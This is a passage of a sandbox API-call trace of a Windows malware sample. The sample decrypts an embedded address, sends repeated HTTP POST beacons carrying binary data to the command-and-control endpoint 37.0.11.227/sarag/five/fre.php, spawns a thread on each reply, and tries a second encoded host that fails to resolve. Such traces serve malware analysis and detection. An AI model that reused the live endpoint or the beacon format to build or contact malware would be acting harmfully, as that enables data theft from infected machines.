returned 0x690000 [0332.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0332.974] GetProcessHeap () returned 0x690000 [0332.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0332.975] GetProcessHeap () returned 0x690000 [0332.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0332.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0332.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0332.989] GetProcessHeap () returned 0x690000 [0332.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0332.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.990] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0332.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.991] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0332.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.992] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.992] GetProcessHeap () returned 0x690000 [0332.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0332.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.993] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0332.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.994] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0332.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.995] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0332.995] GetProcessHeap () returned 0x690000 [0332.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0332.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.996] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0332.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.997] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0332.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.998] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0332.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.999] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0332.999] GetProcessHeap () returned 0x690000 [0332.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0332.999] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0332.999] GetProcessHeap () returned 0x690000 [0332.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0332.999] socket (af=2, type=1, protocol=6) returned 0xbbc [0332.999] connect (s=0xbbc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0333.061] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0333.061] GetProcessHeap () returned 0x690000 [0333.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0333.061] GetProcessHeap () returned 0x690000 [0333.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0333.062] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0333.064] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0333.064] GetProcessHeap () returned 0x690000 [0333.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0333.064] GetProcessHeap () returned 0x690000 [0333.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0333.064] GetProcessHeap () returned 0x690000 [0333.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0333.064] GetProcessHeap () returned 0x690000 [0333.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0333.065] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0333.066] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0333.066] GetProcessHeap () returned 0x690000 [0333.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0333.066] GetProcessHeap () returned 0x690000 [0333.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0333.069] send (s=0xbbc, buf=0x6ad508*, len=242, flags=0) returned 242 [0333.070] send (s=0xbbc, buf=0x6aba40*, len=159, flags=0) returned 159 [0333.070] GetProcessHeap () returned 0x690000 [0333.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0333.070] recv (in: s=0xbbc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0333.172] GetProcessHeap () returned 0x690000 [0333.173] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0333.173] GetProcessHeap () returned 0x690000 [0333.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0333.174] GetProcessHeap () returned 0x690000 [0333.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0333.174] GetProcessHeap () returned 0x690000 [0333.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0333.175] closesocket (s=0xbbc) returned 0 [0333.178] GetProcessHeap () returned 0x690000 [0333.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0333.178] GetProcessHeap () returned 0x690000 [0333.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0333.179] GetProcessHeap () returned 0x690000 [0333.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0333.179] GetProcessHeap () returned 0x690000 [0333.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0333.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1908) returned 0xbbc [0333.182] Sleep (dwMilliseconds=0xea60) [0333.183] GetProcessHeap () returned 0x690000 [0333.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0333.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.185] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0333.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.197] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0333.249] GetProcessHeap () returned 0x690000 [0333.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0333.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.304] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0333.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.307] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0333.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.311] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.311] GetProcessHeap () returned 0x690000 [0333.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0333.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.313] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0333.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.314] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0333.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.314] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0333.315] GetProcessHeap () returned 0x690000 [0333.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0333.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.316] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0333.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.316] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0333.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.317] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0333.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.318] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0333.318] GetProcessHeap () returned 0x690000 [0333.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0333.318] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0333.319] GetProcessHeap () returned 0x690000 [0333.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0333.321] GetProcessHeap () returned 0x690000 [0333.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0333.321] GetProcessHeap () returned 0x690000 [0333.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0333.322] GetProcessHeap () returned 0x690000 [0333.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0333.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0333.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.328] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0333.333] GetProcessHeap () returned 0x690000 [0333.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0333.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.334] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0333.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.336] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0333.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.337] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.337] GetProcessHeap () returned 0x690000 [0333.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0333.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.339] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0333.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.340] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0333.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.343] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0333.343] GetProcessHeap () returned 0x690000 [0333.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0333.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.344] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0333.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.361] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0333.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.362] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0333.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.363] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0333.363] GetProcessHeap () returned 0x690000 [0333.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0333.363] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0333.363] GetProcessHeap () returned 0x690000 [0333.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0333.363] socket (af=2, type=1, protocol=6) returned 0xbc0 [0333.363] connect (s=0xbc0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0333.388] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0333.388] GetProcessHeap () returned 0x690000 [0333.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0333.388] GetProcessHeap () returned 0x690000 [0333.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0333.389] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0333.390] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0333.390] GetProcessHeap () returned 0x690000 [0333.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0333.390] GetProcessHeap () returned 0x690000 [0333.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0333.390] GetProcessHeap () returned 0x690000 [0333.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0333.390] GetProcessHeap () returned 0x690000 [0333.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0333.391] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0333.392] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0333.392] GetProcessHeap () returned 0x690000 [0333.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0333.392] GetProcessHeap () returned 0x690000 [0333.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0333.393] send (s=0xbc0, buf=0x6ad508*, len=242, flags=0) returned 242 [0333.393] send (s=0xbc0, buf=0x6aba40*, len=159, flags=0) returned 159 [0333.393] GetProcessHeap () returned 0x690000 [0333.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0333.393] recv (in: s=0xbc0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0333.459] GetProcessHeap () returned 0x690000 [0333.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0333.461] GetProcessHeap () returned 0x690000 [0333.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0333.461] GetProcessHeap () returned 0x690000 [0333.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0333.462] GetProcessHeap () returned 0x690000 [0333.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0333.462] closesocket (s=0xbc0) returned 0 [0333.465] GetProcessHeap () returned 0x690000 [0333.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0333.466] GetProcessHeap () returned 0x690000 [0333.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0333.466] GetProcessHeap () returned 0x690000 [0333.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0333.466] GetProcessHeap () returned 0x690000 [0333.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0333.484] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x190c) returned 0xbc0 [0333.487] Sleep (dwMilliseconds=0xea60) [0333.489] GetProcessHeap () returned 0x690000 [0333.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0333.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0333.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.501] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0333.519] GetProcessHeap () returned 0x690000 [0333.519] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0333.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.520] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0333.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.521] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0333.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.522] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.522] GetProcessHeap () returned 0x690000 [0333.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0333.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.524] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0333.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.525] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0333.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.526] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0333.527] GetProcessHeap () returned 0x690000 [0333.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0333.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.528] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0333.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.529] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0333.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.530] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0333.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.531] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0333.531] GetProcessHeap () returned 0x690000 [0333.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0333.531] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0333.532] GetProcessHeap () returned 0x690000 [0333.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0333.532] GetProcessHeap () returned 0x690000 [0333.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0333.533] GetProcessHeap () returned 0x690000 [0333.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0333.534] GetProcessHeap () returned 0x690000 [0333.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0333.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.535] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0333.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0333.555] GetProcessHeap () returned 0x690000 [0333.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0333.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.558] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | 